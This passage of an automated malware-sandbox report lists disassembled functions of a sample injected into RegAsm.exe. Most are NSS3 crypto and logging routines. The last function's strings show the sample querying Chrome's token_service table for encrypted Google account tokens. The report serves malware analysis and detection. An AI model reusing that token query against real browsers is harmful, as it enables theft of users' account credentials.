                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f8b1dd37a2d4e3e02f0ebf96fbd9e81fcce32f75fda40e1ee6085e6cae9d0a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9514675A10212DFDF16AF28CC44A7637B9FB52318F158239DD8463726EB34D852CBA1
                                                                                                                                                                                                                                                                  Function 6C894C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D11
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D2A
                                                                                                                                                                                                                                                                  • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D4A
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D57
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D97
                                                                                                                                                                                                                                                                  • PR_Lock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DBA
                                                                                                                                                                                                                                                                  • PR_WaitCondVar.NSS3 ref: 6C894DD4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DE6
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DEF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                  • Opcode ID: f2162320456d24d45ff6211bcab81afb047865ebb7da6c99d76acdb49777d99b
                                                                                                                                                                                                                                                                  • Instruction ID: 7f0a571caa8fec9c32e7f716f7d66e677e79da1385f01f834efd29d804aca141
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2162320456d24d45ff6211bcab81afb047865ebb7da6c99d76acdb49777d99b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A041B4B9A04716CFCF15AF7CC5941697BF0BF86319F068A29D89897B10E730D885CB91
                                                                                                                                                                                                                                                                  Function 6CA27CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27CE0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA27D36
                                                                                                                                                                                                                                                                  • PR_Realloc.NSS3(?,00000080), ref: 6CA27D6D
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27D8B
                                                                                                                                                                                                                                                                  • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CA27DC2
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA27DD8
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000080), ref: 6CA27DF8
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27E06
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                                  • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                                  • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                                  • Opcode ID: 625f569cedfa7dc17c34c1bc985417ebc3e7520a490419d1f43cc32c2c4b22bf
                                                                                                                                                                                                                                                                  • Instruction ID: cfef439303f48f9085bbda568f8209fc97bf5c9ce3d86a765aaefa3ed1f33f72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 625f569cedfa7dc17c34c1bc985417ebc3e7520a490419d1f43cc32c2c4b22bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D41D6B1A002119FDB04CF28CD9096B37B6FF91318B1D856CE819DBB51D735E981CBA1
                                                                                                                                                                                                                                                                  Function 6C95ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C95DE64), ref: 6C95ED0C
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C95ED22
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C95ED4A
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C95ED6B
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C95ED38
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C95ED52
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C95ED83
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C95ED95
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C95ED9D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C97127C,00000000,00000000,00000000), ref: 6C97650E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                  • String ID: security
                                                                                                                                                                                                                                                                  • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                  • Opcode ID: 7d85ad63e5b4e8ca8c7424e365b322e71cdd10bd3102e455a240c87bffbe4560
                                                                                                                                                                                                                                                                  • Instruction ID: bfa1b06bd8d8f0a21c013e0a5d9a45a32005c385287d52fe949c8a4c90b61187
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d85ad63e5b4e8ca8c7424e365b322e71cdd10bd3102e455a240c87bffbe4560
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68116D359012186BEB209A25AC44FBB737CBF6160CF454534E85462E41F72AE52CC6F6
                                                                                                                                                                                                                                                                  Function 6C942CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_InitToken), ref: 6C942CEC
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C942D07
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_Now.NSS3 ref: 6CA20A22
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA20A35
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA20A66
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_GetCurrentThread.NSS3 ref: 6CA20A70
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA20A9D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA20AC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_vsmprintf.NSS3(?,?), ref: 6CA20AE8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20B19
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20B48
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20C76
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: PR_LogFlush.NSS3 ref: 6CA20C7E
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C942D22
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(?), ref: 6CA20B88
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA20C5D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CA20C8D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20C9C
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(?), ref: 6CA20CD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA20CEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20CFB
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20D16
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CA20D26
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20D35
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CA20D65
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CA20D70
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20D90
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: free.MOZGLUE(00000000), ref: 6CA20D99
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C942D3B
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA20BAB
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20BBA
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA20D7E
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C942D54
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA20BCB
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20BDE
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(?), ref: 6CA20C16
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                                                                  • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                                                                  • API String ID: 420000887-1567254798
                                                                                                                                                                                                                                                                  • Opcode ID: 32e254eb4f067d8b00805ff44caeaa956079b1db39d3bb2df62893ed20b09306
                                                                                                                                                                                                                                                                  • Instruction ID: 396b6e9c5cf99e2982f0a581045148d48be5dfa7c0f63fb615f3c8431f51560d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32e254eb4f067d8b00805ff44caeaa956079b1db39d3bb2df62893ed20b09306
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6321F179300261EFDB09AF50DD4CA497BB6FB92329F08C124E508D7622DB30C89ACB71
                                                                                                                                                                                                                                                                  Function 6C980C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(6C982C2A), ref: 6C980C81
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96BE30: SECOID_FindOID_Util.NSS3(6C92311B,00000000,?,6C92311B,?), ref: 6C96BE44
                                                                                                                                                                                                                                                                    • Part of subcall function 6C958500: SECOID_GetAlgorithmTag_Util.NSS3(6C9595DC,00000000,00000000,00000000,?,6C9595DC,00000000,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C958517
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980CC4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C980CD5
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C980D1D
                                                                                                                                                                                                                                                                  • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C980D3B
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C980D7D
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C980DB5
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980DC1
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C980DF7
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C980E05
                                                                                                                                                                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C980E0F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C9595E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C9595F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C959609
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C95961D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_GetInternalSlot.NSS3 ref: 6C95970B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C959756
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: PK11_GetIVLength.NSS3(?), ref: 6C959767
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C95977E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C95978E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3136566230-0
                                                                                                                                                                                                                                                                  • Opcode ID: 05f4047b09ff8ef946612f087f4b657f9baeed1c4acdb7cb07f3fe8c78e014a2
                                                                                                                                                                                                                                                                  • Instruction ID: cac5e7144acfd402442ea28dff9342ed35bb8d72184459125560443ebdf213d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05f4047b09ff8ef946612f087f4b657f9baeed1c4acdb7cb07f3fe8c78e014a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D341B1B1902356ABEB009F65DC41BAF7A78AF2130CF105524E9196BB41E735EA14CBE2
                                                                                                                                                                                                                                                                  Function 00407F1A Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00407F1F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408141
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408166
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408250
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408264
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                                  • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                                  • API String ID: 832884763-1713091031
                                                                                                                                                                                                                                                                  • Opcode ID: 31d244d78756d72c4f0cbef9d0c64589c5f562ce78cc967097005f2a4219adf1
                                                                                                                                                                                                                                                                  • Instruction ID: 16936d27553e3f3333669c107e9d5995ed17cbada246e9f94fc0bad289236bdf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31d244d78756d72c4f0cbef9d0c64589c5f562ce78cc967097005f2a4219adf1
